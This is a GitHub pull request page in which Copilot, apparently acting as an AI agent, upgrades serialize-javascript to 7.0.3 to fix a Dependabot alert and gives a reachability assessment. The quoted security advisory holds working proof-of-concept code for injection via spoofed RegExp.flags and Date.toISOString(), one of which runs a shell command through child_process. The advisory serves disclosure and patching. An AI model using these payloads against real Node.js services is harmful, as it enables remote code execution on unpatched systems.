
fix: upgrade serialize-javascript to 7.0.3 (GHSA-5c6j-r48x-rmvq) #128

Draft
Copilot wants to merge 2 commits into main from copilot/fix-serialize-javascript-vulnerability

Conversation


Copilot AI commented Apr 2, 2026

serialize-javascript ≤7.0.2 allows RCE via spoofed RegExp.flags or Date.prototype.toISOString() — an incomplete fix for CVE-2020-7660. The vulnerable package enters via mocha@11.7.5, which pins serialize-javascript ^6.0.2.

Changes

  • .github/scripts/package.json — adds overrides to force serialize-javascript to 7.0.3, since mocha's own peer constraint blocks the automatic upgrade:
    "overrides": {
      "serialize-javascript": "7.0.3"
    }
  • .github/scripts/package-lock.json — regenerated; node_modules/serialize-javascript now resolves to 7.0.3.

Reachability

serialize-javascript is not called by any application code — only used internally by mocha's test worker. The vulnerable API (attacker-controlled RegExp/Date with spoofed properties passed to serialize()) is never reachable from this codebase. Update addresses scanner findings rather than an active exploit path. Confidence: high.

Original prompt

This section details the Dependabot vulnerability alert you should resolve

<alert_title>Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()</alert_title>
<alert_description>### Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
try {
  eval('obj = ' + output);
} catch (e) {
  // The RegExp constructor rejects "CODE_INJECTION_VIA_FLAGS" as a flags string,
  // but only after the injected assignment inside the argument has already run.
}
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
PoC 2: Code Injection via Date.toISOString()
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
let obj;
eval('obj = ' + output); // new Date("DATE_INJECTION") is an Invalid Date but does not throw
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
PoC 3: Remote Code Execution
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3</alert_description>

high
GHSA-5c6j-r48x-rmvq
serialize-javascript
npm
<vulnerable_versions>6.0.2</vulnerable_versions>
<patched_version>7.0.3</patched_version>
<manifest_path>.github/scripts/package-lock.json</manifest_path>

https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq
https://nvd.nist.gov/vuln/detail/CVE-2020-7660
https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9
https://github.com/advisories/GHSA-hxcc-f52p-wc94
https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
https://github.com/advisories/GHSA-5c6j-r48x-rmvq

<task_instructions>Resolve this alert by updating the affected package to a non-vulnerable version. Prefer the lowest non-vulnerable version (see the patched_version field above) over the latest to minimize breaking changes. Include a Reachability Assessment section in the PR description. Review the alert_description field to understand which APIs, features, or configurations are affected, then search the codebase for usage of those specific items. If the vulnerable code path is reachable, explain how (which files, APIs, or call sites use the affected functionality) and note that the codebase is actively exposed to this vulnerability. If the vulnerable code path is not reachable, explain why (e.g. the affected API is never called, the vulnerable configuration is not used) and note that the update is primarily to satisfy vulnerability scanners rather than to address an active risk. If the advisory is too vague to determine reachability (e.g. 'improper input validation' with no specific API named), state that reachability could not be determined and explain why. Include a confidence level in the reachability assessment (e.g. high confidence if the advisory names a specific API and you confirmed it is or is not called, low confidence if the usage is indirect and hard to trace). If no patched version is available, check the alert_description field for a Workarounds section — the advisory may describe configuration changes or usage pa...

Copilot AI changed the title from "[WIP] Fix vulnerability in serialize-javascript package" to "fix: upgrade serialize-javascript to 7.0.3 (GHSA-5c6j-r48x-rmvq)" on Apr 2, 2026
Copilot AI requested a review from lindluni April 2, 2026 13:28

github-actions bot commented Apr 6, 2026


=============================== Coverage summary ===============================
Statements   : 0% ( 0/46 )
Branches     : 0% ( 0/20 )
Functions    : 0% ( 0/6 )
Lines        : 0% ( 0/46 )
================================================================================
